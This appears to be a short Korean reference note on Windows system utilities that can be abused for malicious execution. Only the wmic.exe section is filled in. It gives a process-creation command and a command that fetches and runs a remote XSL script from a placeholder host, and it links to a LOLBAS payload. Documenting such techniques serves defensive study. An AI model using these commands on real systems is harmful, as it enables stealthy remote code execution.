악성행위에 사용될 수 있는 시스템 유틸리티

0. 개요

1. 명령어 실행

2. 스크립트 실행

3. 파일 실행

4. 다운로드

5. 컴파일

6. 기타

0. 개요

cmd 외에도 여러 시스템 유틸리티가 악성 행위에 사용될 수 있다. 여러 자료들을 참고하여 정리하였고, 이후 추가 사항이 있을 시 더 보충하도록 하겠다.

1. 명령어 실행

1.1 cmd.exe

생략.

1.2 powershell.exe

생략.

1.3 wmic.exe

따로 정리할 예정이므로 간략히만 정리한다.

process call create "cmd.exe /c calc"

다음 링크와 같이 xsl 파일을 서버에 생성한 후 아래의 명령어로 실행시키는 방식이 있다. [ https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl ] 특징이라면 명령어에서 xsl 확장자를 받아야 하는데 이 확장자가 흔하지는 않는다는 것이며 따라서 서버에서도 xsl 확장자 형태로 존재해야 한다는 점이다.

wmic os get /format:http://www.aaa.com/data/aaa.xsl